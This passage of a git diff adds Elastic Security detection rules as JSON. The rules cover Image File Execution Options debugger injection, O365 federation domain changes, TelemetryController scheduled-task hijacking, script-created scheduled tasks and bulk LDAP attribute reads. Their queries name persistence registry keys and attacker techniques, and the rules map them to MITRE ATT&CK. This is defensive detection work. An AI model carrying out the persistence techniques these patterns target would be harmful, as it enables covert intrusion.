+ "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 112 + }, + "id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_106.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_106.json new file mode 100644 index 00000000000..df341f91423 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_106.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Image File Execution Options Injection", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "references": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6839c821-011d-43bd-bd5b-acff00257226", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "6839c821-011d-43bd-bd5b-acff00257226_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_107.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_107.json new file mode 100644 index 00000000000..b9bec088a7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_107.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Image File Execution Options Injection", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "references": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6839c821-011d-43bd-bd5b-acff00257226", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "6839c821-011d-43bd-bd5b-acff00257226_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_103.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_103.json new file mode 100644 index 00000000000..32baae485fc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_103.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New or Modified Federation Domain", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.002", + "name": "Domain Trust Modification", + "reference": "https://attack.mitre.org/techniques/T1484/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_105.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_105.json new file mode 100644 index 00000000000..27f9591583e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_105.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New or Modified Federation Domain", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.002", + "name": "Domain Trust Modification", + "reference": "https://attack.mitre.org/techniques/T1484/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_206.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_206.json new file mode 100644 index 00000000000..c48fc9a365e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_206.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New or Modified Federation Domain", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", + "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.002", + "name": "Domain Trust Modification", + "reference": "https://attack.mitre.org/techniques/T1484/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_109.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_109.json new file mode 100644 index 00000000000..9a9ad9b52a9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_109.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via TelemetryController Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"CompatTelRunner.exe\" and process.args : \"-cv*\" and\n not process.name : (\"conhost.exe\",\n \"DeviceCensus.exe\",\n \"CompatTelRunner.exe\",\n \"DismHost.exe\",\n \"rundll32.exe\",\n \"powershell.exe\")\n", + "references": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "68921d85-d0dc-48b3-865f-43291ca2c4f2_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_110.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_110.json new file mode 100644 index 00000000000..cf5accac00a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_110.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via TelemetryController Scheduled Task Hijack", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"CompatTelRunner.exe\" and process.args : \"-cv*\" and\n not process.name : (\"conhost.exe\",\n \"DeviceCensus.exe\",\n \"CompatTelRunner.exe\",\n \"DismHost.exe\",\n \"rundll32.exe\",\n \"powershell.exe\")\n", + "references": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "68921d85-d0dc-48b3-865f-43291ca2c4f2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_106.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_106.json new file mode 100644 index 00000000000..8b1eaa30cb4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_106.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Scheduled Task Created by a Windows Script", + "note": "## Triage and analysis\n\nDecode the base64 encoded Tasks Actions registry value to investigate the task's configured action.", + "query": "sequence by host.id with maxspan = 30s\n [any where host.os.type == \"windows\" and \n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "689b9d57-e4d5-4357-ad17-9c334609d79a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "689b9d57-e4d5-4357-ad17-9c334609d79a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_1.json b/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_1.json new file mode 100644 index 00000000000..77bdab05d76 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68ad737b-f90a-4fe5-bda6-a68fa460044e_1.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify read access to a high number of Active Directory object attributes. The knowledge of objects properties can help adversaries find vulnerabilities, elevate privileges or collect sensitive information.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Access to LDAP Attributes", + "query": "any where event.action == \"Directory Service Access\" and\n event.code == \"4662\" and not winlog.event_data.SubjectUserSid : \"S-1-5-18\" and\n winlog.event_data.AccessMaskDescription == \"Read Property\" and length(winlog.event_data.Properties) >= 2000\n", + "related_integrations": 